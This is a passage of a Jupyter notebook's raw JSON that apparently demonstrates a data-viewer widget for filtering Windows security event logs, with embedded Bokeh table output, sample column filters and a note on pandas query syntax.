AcOhe/4R2QgBw6V7/hHZCAHBcX/+EdkIAcGVf/4R2QgAAC27/hHZCAABLmf2EdkIAAHSn/YR2QgBAdaf9hHZCANDYp/2EdkIA0PGn/YR2QgAQfA7+hHZCADCkHP6EdkIAEKUc/oR2QgAw+Rz+hHZCAAAhHf6EdkIAABNJ/oR2QgAAPFf+hHZCAEA9V/6EdkIA0K5X/oR2QgBwuVf+hHZCAHDHK/6EdkIAAEgy/oR2QgAA8Dn+hHZCALDxOf6EdkIA0EA6/oR2QgAwbTr+hHZCAED6Ov6EdkIA4Po6/oR2QgAA49P9hHZCADAM4v2EdkIAQA3i/YR2QgAgaeL9hHZCAACJ4v2EdkIAAJe2/YR2QgAwwMT9hHZCAEDBxP2EdkIAUCHF/YR2QgBwPcX9hHZCAAAv8f2EdkIA0Fj//YR2QgDgWf/9hHZCADCx//2EdkIAoNX//YR2QgCwCkH9hHZCAHBnQf2EdkIA0O1B/YR2QgAQkU/9hHZCABCST/2EdkIAgABQ/YR2QgBwDVD9hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1688\"},\"selection_policy\":{\"id\":\"1689\"}},\"id\":\"1586\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"editor\":{\"id\":\"1691\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1690\"},\"title\":\"Account\",\"width\":26},\"id\":\"1610\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1688\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1692\",\"type\":\"StringFormatter\"},{\"attributes\":{\"booleans\":[false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,true,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false]},\"id\":\"1619\",\"type\":\"BooleanFilter\"},{\"attributes\":{\"editor\":{\"id\":\"1700\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1699\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1614\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1696\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1693\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1692\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1611\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1700\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1690\",\"type\":\"StringFormatter\"},{\"attributes\":{\"filters\":[{\"id\":\"1619\"}],\"source\":{\"id\":\"1586\"}},\"id\":\"1620\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1698\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1702\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1701\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1615\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1696\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1695\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1612\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1616\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1694\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1616\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1617\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1702\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1695\",\"type\":\"StringFormatter\"}],\"root_ids\":[\"1608\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n var render_items = [{\"docid\":\"9f99a709-de57-4c7f-80e9-30ace23bde13\",\"notebook_comms_target\":\"1703\",\"root_ids\":[\"1608\"],\"roots\":{\"1608\":\"a7b176c6-e8a3-485e-919d-500035a0ca26\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n var attempts = 0;\n var timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1608" } }, "output_type": "display_data" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "ea45bf84dd3646578c9f60b4113bea79", "version_major": 2, "version_minor": 0 }, "text/plain": [ "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "viewer = DataViewer(data, selected_cols=columns)\n", "\n", "# manually add a filter \n", "sample_filter = {\n", " \"ParentProcessName contains 'cmd'\": (\"ParentProcessName\", False, \"contains\", \"cmd\"),\n", " \"CommandLine contains 'script'\": (\"CommandLine\", False, \"contains\", \"script\"),\n", "}\n", "viewer.import_filters(sample_filter)\n", "\n", "# We're opening the \"Filter data\" drop-down programmatically\n", "# Just click on the small arrow to the left of \"Filter data\" to open this\n", "viewer.accordion.selected_index = 1\n", "viewer" ] }, { "cell_type": "code", "execution_count": 6, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{\"ParentProcessName contains 'cmd'\": FilterExpr(column='ParentProcessName', inv=False, operator='contains', expr='cmd'),\n", " \"CommandLine contains 'script'\": FilterExpr(column='CommandLine', inv=False, operator='contains', expr='script')}" ] }, "execution_count": 6, "metadata": {}, "output_type": "execute_result" } ], "source": [ "viewer.filters" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Advanced querying with filter **query** operator\n", "\n", "The **query** operator lets you type in a pandas query expression.\n", "\n", "> Note, the selected column is not relevant for this operator since you specify the column name
\n", "> within the query expression. You can select any column name.\n", "\n", "See this documentation for the [syntax of the pandas `query` method ](https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#the-query-method)" ] }, { "cell_type": "code", "execution_count": 7, "metadata": {}, "outputs": [ { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n var JS_MIME_TYPE = 'application/javascript';\n var HTML_MIME_TYPE = 'text/html';\n var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n var CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n var script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n var cell = handle.cell;\n\n var id = cell.output_area._bokeh_element_id;\n var server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd, {\n iopub: {\n output: function(msg) {\n var id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n var output_area = handle.output_area;\n var output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n var bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n var script_attrs = bk_div.children[0].attributes;\n for (var i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n var toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n var events = require('base/js/events');\n var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(null);\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n var docs_json = {\"64015a85-dd87-47e6-a6eb-8974bf509dca\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1803\"},{\"id\":\"1804\"},{\"id\":\"1810\"},{\"id\":\"1805\"},{\"id\":\"1806\"},{\"id\":\"1807\"},{\"id\":\"1808\"}],\"editable\":true,\"height\":160,\"source\":{\"id\":\"1779\"},\"view\":{\"id\":\"1813\"},\"width_policy\":\"max\"},\"id\":\"1801\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1899\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1899\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1898\"},\"title\":\"Account\",\"width\":26},\"id\":\"1803\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1903\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1907\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1901\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1900\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1804\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1902\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1809\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1810\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1898\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1910\",\"type\":\"StringEditor\"},{\"attributes\":{\"filters\":[{\"id\":\"1812\"}],\"source\":{\"id\":\"1779\"}},\"id\":\"1813\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1908\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1896\",\"type\":\"Selection\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",